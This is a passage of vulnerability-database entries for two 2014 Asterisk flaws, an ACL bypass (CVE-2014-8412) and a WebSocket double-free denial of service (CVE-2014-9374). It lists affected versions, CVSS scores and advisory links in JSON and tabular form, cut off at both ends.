              "matchCriteriaId": "677AB746-AE4F-46B0-BEE3-82A1FE77271F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.28.0:*:*:*:lts:*:*:*",
              "matchCriteriaId": "C675C7BA-65E9-4A0A-9A6D-1EBCBEA1D718",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert1:*:*:lts:*:*:*",
              "matchCriteriaId": "6AD7C9B3-D029-4E05-8E80-3ADA904FAC1C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert2:*:*:lts:*:*:*",
              "matchCriteriaId": "CE71221B-4D55-4643-B6D1-307B2CF41F98",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert3:*:*:lts:*:*:*",
              "matchCriteriaId": "88124275-9BEB-4D53-9E4D-1AC8C52F2D0F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert4:*:*:lts:*:*:*",
              "matchCriteriaId": "4F3CEFEF-72B6-4B58-81FE-01BCEEFB3013",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert5:*:*:lts:*:*:*",
              "matchCriteriaId": "AA637187-0EAE-4756-AD72-A0B2FABCA070",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert6:*:*:lts:*:*:*",
              "matchCriteriaId": "6DAF6784-0B31-4104-9D85-473D5AFAB785",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert7:*:*:lts:*:*:*",
              "matchCriteriaId": "77B06B83-D62C-4A0E-BE94-83C9A02CE55A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6.0:*:*:*:lts:*:*:*",
              "matchCriteriaId": "D6EE9895-FB94-451D-8701-8C0DD8F5BED0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "50388096-3988-4931-B67B-156A9603E0EA",
              "versionEndExcluding": "1.8.32.1",
              "versionStartIncluding": "1.8.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "8CDFB271-72DA-4E23-87A0-E50EE633843F",
              "versionEndExcluding": "11.14.1",
              "versionStartIncluding": "11.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "F21F0B73-A30F-4673-B3A8-D9F456FFCEF2",
              "versionEndExcluding": "12.7.1",
              "versionStartIncluding": "12.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "0C83CD93-7CBA-4FF0-B29E-A509F4A3D5E2",
              "versionEndExcluding": "13.0.1",
              "versionStartIncluding": "13.0.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "The (1) VoIP channel drivers, (2) DUNDi, and (3) Asterisk Manager Interface (AMI) in Asterisk Open Source 1.8.x before 1.8.32.1, 11.x before 11.14.1, 12.x before 12.7.1, and 13.x before 13.0.1 and Certified Asterisk 1.8.28 before 1.8.28-cert3 and 11.6 before 11.6-cert8 allows remote attackers to bypass the ACL restrictions via a packet with a source IP that does not share the address family as the first ACL entry."
    },
    {
      "lang": "es",
      "value": "(1) Los controladores de canales VoIP, (2) DUNDi, y (3) Asterisk Manager Interface (AMI) en Asterisk Open Source 1.8.x anterior a 1.8.32.1, 11.x anterior a 11.14.1, 12.x anterior a 12.7.1, y 13.x anterior a 13.0.1 y Certified Asterisk 1.8.28 anterior a 1.8.28-cert3 y 11.6 anterior a 11.6-cert8 permite a atacantes remotos evadir las restricciones ACL a trav\u00e9s de un paquete con una fuente IP que no comparte la familia de direcciones como la primera entrada ACL."
    }
  ],
  "id": "CVE-2014-8412",
  "lastModified": "2024-11-21T02:19:01.960",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "NONE",
          "baseScore": 5.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2014-11-24T15:59:04.140",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2014-012.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2014-012.html"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-264"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2014-12-12 15:59

Modified

2024-11-21 02:20

Severity ?

Summary

Double free vulnerability in the WebSocket Server (res_http_websocket module) in Asterisk Open Source 11.x before 11.14.2, 12.x before 12.7.2, and 13.x before 13.0.2 and Certified Asterisk 11.6 before 11.6-cert9 allows remote attackers to cause a denial of service (crash) by sending a zero length frame after a non-zero length frame.

References

URL	Tags
cve@mitre.org	http://advisories.mageia.org/MGASA-2015-0010.html
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2014-019.html	Patch, Vendor Advisory
cve@mitre.org	http://packetstormsecurity.com/files/129473/Asterisk-Project-Security-Advisory-AST-2014-019.html
cve@mitre.org	http://seclists.org/fulldisclosure/2014/Dec/48
cve@mitre.org	http://secunia.com/advisories/60251
cve@mitre.org	http://www.mandriva.com/security/advisories?name=MDVSA-2015:018
cve@mitre.org	http://www.securityfocus.com/archive/1/534197/100/0/threaded
cve@mitre.org	http://www.securityfocus.com/bid/71607
cve@mitre.org	http://www.securitytracker.com/id/1031345
af854a3a-2127-422b-91ae-364da2661108	http://advisories.mageia.org/MGASA-2015-0010.html
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2014-019.html	Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://packetstormsecurity.com/files/129473/Asterisk-Project-Security-Advisory-AST-2014-019.html
af854a3a-2127-422b-91ae-364da2661108	http://seclists.org/fulldisclosure/2014/Dec/48
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/60251
af854a3a-2127-422b-91ae-364da2661108	http://www.mandriva.com/security/advisories?name=MDVSA-2015:018
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/archive/1/534197/100/0/threaded
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/71607
af854a3a-2127-422b-91ae-364da2661108	http://www.securitytracker.com/id/1031345

Impacted products

Vendor	Product	Version
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.1.0
digium	asterisk	11.1.0
digium	asterisk	11.1.0
digium	asterisk	11.1.0
digium	asterisk	11.2.0
digium	asterisk	11.2.0
digium	asterisk	11.2.0
digium	asterisk	11.3.0
digium	asterisk	11.3.0
digium	asterisk	11.4.0
digium	asterisk	11.4.0
digium	asterisk	11.4.0
digium	asterisk	11.4.0
digium	asterisk	11.4.0
digium	asterisk	11.5.0
digium	asterisk	11.5.0
digium	asterisk	11.5.0
digium	asterisk	11.6.0
digium	asterisk	11.6.0
digium	asterisk	11.6.0
digium	asterisk	11.7.0
digium	asterisk	11.7.0
digium	asterisk	11.7.0
digium	asterisk	11.8.0
digium	asterisk	11.8.0
digium	asterisk	11.8.0
digium	asterisk	11.8.0
digium	asterisk	11.9.0
digium	asterisk	11.9.0
digium	asterisk	11.9.0
digium	asterisk	11.9.0
digium	asterisk	11.10.0
digium	asterisk	11.10.0
digium	asterisk	11.11.0
digium	asterisk	11.11.0
digium	asterisk	11.12.0
digium	asterisk	11.12.0
digium	asterisk	11.13.0
digium	asterisk	11.13.0
digium	asterisk	11.14.0
digium	asterisk	11.14.0
digium	asterisk	11.14.0
digium	asterisk	12.0.0
digium	asterisk	12.1.0
digium	asterisk	12.1.0
digium	asterisk	12.1.0
digium	asterisk	12.1.0
digium	asterisk	12.2.0
digium	asterisk	12.2.0
digium	asterisk	12.2.0
digium	asterisk	12.2.0
digium	asterisk	12.3.0
digium	asterisk	12.3.0
digium	asterisk	12.3.0
digium	asterisk	12.4.0
digium	asterisk	12.4.0
digium	asterisk	12.5.0
digium	asterisk	12.5.0
digium	asterisk	12.6.0
digium	asterisk	12.6.0
digium	asterisk	12.7.0
digium	asterisk	12.7.0
digium	asterisk	12.7.0
digium	asterisk	12.7.1
digium	asterisk	13.0.0
digium	asterisk	13.0.1

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert1:*:*:lts:*:*:*",
              "matchCriteriaId": "6AD7C9B3-D029-4E05-8E80-3ADA904FAC1C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert2:*:*:lts:*:*:*",
              "matchCriteriaId": "CE71221B-4D55-4643-B6D1-307B2CF41F98",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert3:*:*:lts:*:*:*",
              "matchCriteriaId": "88124275-9BEB-4D53-9E4D-1AC8C52F2D0F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert4:*:*:lts:*:*:*",
              "matchCriteriaId": "4F3CEFEF-72B6-4B58-81FE-01BCEEFB3013",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert5:*:*:lts:*:*:*",
              "matchCriteriaId": "AA637187-0EAE-4756-AD72-A0B2FABCA070",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert6:*:*:lts:*:*:*",
              "matchCriteriaId": "6DAF6784-0B31-4104-9D85-473D5AFAB785",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert7:*:*:lts:*:*:*",
              "matchCriteriaId": "77B06B83-D62C-4A0E-BE94-83C9A02CE55A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert8:*:*:lts:*:*:*",
              "matchCriteriaId": "CAD17809-CBB1-4E41-99C9-20FE56853563",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6.0:*:*:*:lts:*:*:*",
              "matchCriteriaId": "D6EE9895-FB94-451D-8701-8C0DD8F5BED0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F53B8453-F35A-49BE-8129-774BADF71BA7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "CCB0C07E-DA2F-4169-848D-C3315CDC1CB3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "410C43E6-5912-4C22-A592-7CF94402EEB7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "D50A355E-1B55-4DD2-8100-EB81AA6FC40E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.0.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "9ADF4230-EFEB-45EC-9C96-0262B4A3E459",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "A9B51588-50A2-40B2-A007-06F57D38C7AA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "CDE2B00C-6AC0-4166-8A25-EFC42CE7F737",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "9FD404B4-2B0A-4D7A-8CF6-E2C6B4BACBB7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.1.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "617FC4AF-D152-4EE1-828D-C2A6AD0DFD3B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F31715AF-5A35-4D0B-8E01-BB6E4CB7E02F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.2.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "1548C574-CD51-49F6-91B1-B06C504000E4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.2.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "D56C2C11-4B42-43AB-9DAE-61C15D107160",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.3.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "69F2DED4-39F5-44C8-BEA3-22692D28C631",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.3.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "AD172E70-238B-4B01-A922-8021B5627092",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "C689A32B-E87D-492F-B3F6-7B80DFA049C8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.4.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "5FB3863D-7F46-4C4A-9E6B-C255CDF0D953",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.4.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "7239304D-C383-4F26-BB08-65ADD2380015",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.4.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "1AC153C2-258E-4EE6-845F-8E8C68AA242D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.4.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "1453BB31-D674-4A05-AB2A-2502D127C3E9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "229B7982-9775-42AA-B8F5-FE920CCAA497",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.5.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "326845DF-2DB2-406B-BE0F-877384DAACFE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.5.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "E0FC2D46-FD1B-421F-8773-BB41B1E9A831",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.6.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "868865A1-E074-4DB0-A119-D24C5C53FEF9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.6.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "1794440C-7068-4673-9142-6221B8A39E5F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.6.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "C5CF286B-3377-4AE9-A7B9-8535641D639A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.7.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "50EC8D9D-3483-4080-8000-496343BC8BFD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.7.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "6695F632-6AC4-400F-B513-280304ABC1F3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.7.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "A3423C40-240A-4237-8B0F-A4B4ED421C3F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "24F62C78-2913-463F-B689-353AB2371E3F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.8.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "87FCBE6A-C1CD-48EF-A435-4CEADD46C917",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.8.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "42E0E639-70A2-41EE-9B34-A9223D1958AF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.8.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "32E84D64-0CB8-46BF-BD3F-8CA2E0CE4C57",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.9.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "A276363F-F897-4E6D-9D55-5F5AA73DEE26",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.9.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "38230656-6242-4D24-AA67-F42A6FA2FC7F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.9.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "20ED9FC3-5E56-4AE7-903F-267CAE7F2CA5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.9.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "84F88075-9935-45BF-88B7-21ACE8AAB314",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.10.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "DB16D9D6-A2F6-4C4B-B364-1B63B1FFB5F0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.10.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "283793E4-0AE8-48D9-ABCF-70E44FE55C4D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.11.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "C4EABFC3-24FA-4441-9F2B-650D90AE5CC6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.11.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "3DA61A22-3DD0-46A3-8C13-F25F4F03FD35",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.12.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "2026FD07-103C-4691-AFA4-88C490382F28",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.12.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "791700CD-E007-489E-9BC6-37025CAA8144",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.13.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "4061B4C7-8315-450C-866A-C4F3A6BCB1A1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.13.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "C6EA7154-7F08-4E43-9270-E617632230AC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.14.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "EC6047FB-D1BD-4E21-B6BC-E51374C4B0E3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.14.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "2DC51129-8F38-4505-90FB-4FFDED45BABF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:11.14.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "4CA571E0-B513-47AA-95BE-EB4DD2AA91E2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "B446105E-6C8E-495A-BF83-A33CB33485A5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "0B53364B-5278-46E9-961A-192CA334CB09",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "3B4D6D24-A718-4962-AD4E-F19AFB03BFF4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "BE2F0D0D-761C-4338-93F0-506E94E57000",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.1.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "3D38DFCA-E357-4A28-8F03-FDADF40A5185",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F42C9442-9EBC-4CA5-AB1C-BA0662C27BDC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.2.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "71762B58-A08B-405B-9596-6D15CF4A95D0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.2.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "EA48C05A-E898-42EE-A699-94BBD66E5E0A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.2.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "EDCB78F8-AAC8-44B1-BDF4-C73BC8951EC3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.3.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "5D92FFF6-E7B2-4210-A652-79AC6B74002C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.3.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "DB5E92FB-9CF8-461E-A665-3407D265DF17",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.3.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "536F6C10-3165-40F7-931A-23765AB87555",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "133288EC-8A78-4C9D-BF94-9900CD3D2260",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.4.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "B2E54998-B257-478E-9E52-2BB4F4CD6429",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "5FD4498A-72BD-40EB-A332-DE10C87C1015",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.5.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "71961599-009C-42F4-AA26-9B16C39F3CBC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.6.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "B98A2EA6-DCC6-4F8B-B132-6692AED16CF4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.6.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "672EDC0E-D70A-4BB0-B7FE-5D422C737862",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.7.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "D41387EE-E8B6-4B4F-BC52-7FED09322A20",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.7.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "8E9E50F8-0123-4C9E-88E1-5DCE08770B68",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.7.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "F7C605A3-8517-4215-9AD3-980D587B22DB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:12.7.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "866815AE-D1FE-460C-A3BC-70C251655C1C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "7B635C21-C193-43AF-A139-98604F324ABF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "FB2C4E1E-6B90-4DCC-BC09-7D19FBA65C3F",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Double free vulnerability in the WebSocket Server (res_http_websocket module) in Asterisk Open Source 11.x before 11.14.2, 12.x before 12.7.2, and 13.x before 13.0.2 and Certified Asterisk 11.6 before 11.6-cert9 allows remote attackers to cause a denial of service (crash) by sending a zero length frame after a non-zero length frame."
    },
    {
      "lang": "es",
      "value": "Vulnerabilidad de doble liberaci\u00f3n en WebSocket Server (el m\u00f3dulo res_http_websocket) en Asterisk Open Source 11.x anterior a 11.14.2, 12.x anterior a 12.7.2, y 13.x anterior a 13.0.2 y Certified Asterisk 11.6 anterior a 11.6-cert9 permite a atacantes remotos causar una denegaci\u00f3n de servicio (ca\u00edda) mediante el envio de un Frame de longitud cero despu\u00e9s de un Frame de longitud no cero."
    }
  ],
  "evaluatorComment": "\u003ca href=\"http://cwe.mitre.org/data/definitions/415.html\"\u003eCWE-415: Double Free\u003c/a\u003e",
  "id": "CVE-2014-9374",
  "lastModified": "2024-11-21T02:20:43.697",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 5.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2014-12-12T15:59:14.883",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://advisories.mageia.org/MGASA-2015-0010.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2014-019.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://packetstormsecurity.com/files/129473/Asterisk-Project-Security-Advisory-AST-2014-019.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://seclists.org/fulldisclosure/2014/Dec/48"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://secunia.com/advisories/60251"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2015:018"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/archive/1/534197/100/0/threaded"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/bid/71607"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securitytracker.com/id/1031345"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://advisories.mageia.org/MGASA-2015-0010.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
